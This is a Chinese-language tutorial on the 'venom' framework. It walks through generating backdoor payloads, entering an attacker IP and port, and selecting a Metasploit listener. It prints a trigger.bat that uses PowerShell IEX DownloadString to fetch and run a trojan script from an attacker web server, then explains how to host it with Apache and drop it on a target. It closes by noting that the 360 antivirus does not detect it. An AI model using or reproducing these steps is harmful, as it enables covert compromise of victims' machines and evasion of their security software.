下載安裝
下載地址:https://github.com/r00t-3xp10it/venom
1.從Github上下載框架,你可以下載到以下格式:
tar.gz OR zip OR git clone
2.賦予文件可執(zhí)行權(quán)限:
cd venom-main
sudo chmod -R +x *.sh
sudo chmod -R +x *.py
3.安裝依賴關(guān)系包:
cd aux
sudo ./setup.sh
4.運行
sudo ./venom.sh

使用步驟:
1.上圖這里的模塊比較多有?apk(安卓)/exe/php/vbs/bat/?等格式。在這里我以?11號?模塊為例:

2. 填寫攻擊者的?IP?以及?端口:


3.填寫?后門名稱:

4. 填寫后門?監(jiān)聽模塊類型:

4. 查看?outoput?輸出文件。

5.這里選擇?msf?的后門模塊,選擇完后會自動幫你設(shè)置相關(guān)參數(shù),—-更加自動化,懶人化。


6.我們這里只需要 trigger.bat 文件,到目標(biāo)系統(tǒng)運行一次即可!
在此之前,我們簡單查看下?bat?文件的內(nèi)容。這里需要我們把?xxxx.ps1?文件,放到?web?服務(wù)器上。 讓?powershell?去遠(yuǎn)程下載木馬文件。
:: powershell template | Author: r00t-3xp10it
:: Matthew Graeber - DownloadString
:: Download/execute payload in RAM
:: ---
@echo off
echo [*] Please wait, preparing software ...
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.149/demon.ps1')
7.開啟?kali?下的?apache?服務(wù),將?xxxx.ps1丟到?/var/www/?目錄下,以便讓木馬文件訪問攻擊者?web?地址。
service apache2 start

8.準(zhǔn)備工作完成,將?trigger.bat?文件丟到目標(biāo)系統(tǒng),可以嘗試使用?360?掃描檢查??梢钥吹剑?60 并未做任何攔截及報毒